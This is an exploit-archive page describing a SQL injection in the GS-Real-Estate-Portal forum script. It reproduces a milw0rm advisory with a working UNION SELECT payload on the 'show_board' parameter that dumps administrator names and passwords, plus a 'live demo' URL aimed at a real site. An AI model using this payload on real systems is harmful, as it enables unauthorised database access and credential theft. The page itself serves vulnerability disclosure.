header-logo
Suggest Exploit
vendor:
GS-Real-Estate-Portal
by:
Cyb3r-1sT
8.8
CVSS
HIGH
SQL Injection
89
CWE
Product Name: GS-Real-Estate-Portal
Affected Version From: N/A
Affected Version To: N/A
Patch Exists: YES
Related CWE: N/A
CPE: N/A
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
2009

GS-Real-Estate-Portal SQL Injection Vulnerability

A SQL injection vulnerability exists in GS-Real-Estate-Portal, which allows an attacker to execute arbitrary SQL commands via the 'show_board' parameter in the 'index.php' script. An attacker can exploit this vulnerability to gain access to sensitive information such as usernames and passwords stored in the database. The vulnerable code can be found in the 'index.php' script, where the 'show_board' parameter is not properly sanitized before being used in a SQL query. An attacker can exploit this vulnerability by sending a specially crafted HTTP request containing malicious SQL commands.

Mitigation:

The vendor has released a patch to address this vulnerability. It is recommended to apply the patch as soon as possible.
Source

Exploit-DB raw data:

                          ||          ||   | ||        
                   o_,_7 _||  . _o_7 _|| 4_|_||  o_w_, 
                  ( :   /    (_)    /           (   .  
|-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=|
|     _                   __           __       __          ______     |
|   /' \            __  /'__`\        /\ \__  /'__`\       /\  ___\    |
|  /\_, \    ___   /\_\/\_\L\ \    ___\ \ ,_\/\ \/\ \  _ __\ \ \__/    |
|  \/_/\ \ /' _ `\ \/\ \/_/_\_<_  /'___\ \ \/\ \ \ \ \/\`'__\ \___``\  |
|     \ \ \/\ \/\ \ \ \ \/\ \L\ \/\ \__/\ \ \_\ \ \_\ \ \ \/ \/\ \L\ \ |
|      \ \_\ \_\ \_\_\ \ \ \____/\ \____\\ \__\\ \____/\ \_\  \ \____/ |
|       \/_/\/_/\/_/\ \_\ \/___/  \/____/ \/__/ \/___/  \/_/   \/___/  |
|                  \ \____/ >> Kings of injection                      |
|                   \/___/                                             |
|                                                                      |
|-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=|


<<!>> Found by  :  Cyb3r-1sT

<<!>> C0ntact : cyb3r-1st [at] hotmail.com 
                   
<<!>> Groups : InjEctOr5 T3am 

<<!>> site : tryag.cc/cc  $&$ hackteach.org/cc

=======================================================
++++++++++++++++++++ Script information++++++++++++++++++++++
=======================================================


<<->> script        : gs-real-estate-portal

<<->> script site : http://hostnomi.net/detail.php?spid=44                



=======================================================
++++++++++++++++++++++++ Exploit +++++++++++++++++++++++++
=======================================================


<<->> D0rk    : find it

<<->> Exploit :>>>

          >>>> www.site.me/forum/index.php?show_board=99999+union+select+0,0,0,0,0,0,0,0,0,concat(admin_name,0x3a,admin_pass),0,0,0,0,0,0,0+from+tbl_admin/*

<<->> live demo >>>

         >>>> http://hostnomi.net/int/forum/index.php?show_board=99999+union+select+0,0,0,0,0,0,0,0,0,concat(admin_name,0x3a,admin_pass),0,0,0,0,0,0,0+from+tbl_admin/*

=======================================================
+++++++++++++++++++++++++ Greetz ++++++++++++++++++++++++
=======================================================


all freinds ,  muslim , and stroke  .... and for the kids who send the message :) u just kide 

# milw0rm.com [2008-11-14]